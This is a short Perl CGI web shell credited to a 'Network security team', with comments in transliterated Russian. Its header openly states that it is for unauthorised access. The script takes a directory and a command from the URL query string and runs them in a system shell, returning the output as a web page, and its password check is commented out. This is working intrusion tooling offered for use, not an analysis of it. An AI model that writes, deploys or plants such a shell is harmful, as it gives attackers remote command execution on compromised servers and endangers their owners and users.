############################################################ ## Network security team ## ############################################################ ##Coder: Ins ## ############################################################ ##Ob dannom scripte: Eto prostoj shell napisannyj na perle## ############################################################ #V celjah nesankcionirovannogo dostupa smeni etot parol`" #$pwd=''; print "Content-type: text/html\n\n"; &read_param(); if (!defined$param{dir}){$param{dir}="/"}; if (!defined$param{cmd}){$param{cmd}="ls -la"}; ##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};## print << "[ins1]"; ::Network Security Team:: Network security team :: CGI Shell

Vvedite zapros:
[ins1] print "cd $param{dir}&&$param{cmd}"; print << "[ins2]";
Otvet na zapros:
[ins2]

#if ($param{pwd} ne $pwd){print "Nepravelnij user";}
open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
while ($line=){print "$line";};
close (FILEHANDLE);

print << "[ins3]";
DIR dlja sledujushego zaprosa: Sledujushij zapros:
[ins3] sub read_param { $buffer = "$ENV{'QUERY_STRING'}"; @pairs = split(/&/, $buffer); foreach $pair (@pairs) { ($name, $value) = split(/=/, $pair); $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $value =~ s/\+/ /g; $value =~ s/%20/ /g; $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $param{$name} = $value; } } #########################<>#####################################